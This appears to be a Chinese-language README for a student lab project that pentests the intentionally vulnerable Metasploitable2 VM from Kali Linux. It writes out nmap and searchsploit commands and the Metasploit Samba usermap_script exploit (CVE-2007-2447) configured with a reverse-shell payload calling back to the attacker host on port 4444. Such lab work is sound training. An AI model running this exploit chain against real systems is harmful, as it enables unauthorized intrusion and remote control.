使用 Kali Linux 对 Metasploitable2 进行实战渗透测试项目。包含完整工作流程:Nmap 扫描、枚举、Metasploit 漏洞利用(Samba CVE-2007-2447)、后渗透验证和缓解步骤。仓库包含命令、输出以及展示攻击技术和防御建议的报告。
实习项目 2 — Metasploitable2 渗透测试
摘要: 本项目演示了完整的渗透测试工作流程:侦察、枚举、漏洞利用、后渗透验证以及缓解建议。使用的目标机器是 Metasploitable2,攻击机为 Kali Linux。
工具: Kali Linux(攻击机) Nmap(侦察) Metasploit Framework(漏洞利用) SearchSploit / Exploit-DB(分类筛选)
执行的步骤:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
识别出的服务(示例):vsftpd 2.3.4(端口 21 banner),Samba smbd 3.x(端口 445)。searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
将服务与潜在漏洞利用进行匹配(vsftpd 后门、Samba username-map)。msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
获得交互式 shell 并验证了用户上下文。id uname -a结果 通过 Samba 漏洞利用成功获得远程 shell,记录了攻击路径,并制定了缓解计划。完整日志和命令输出存储在 scans/ 文件夹中。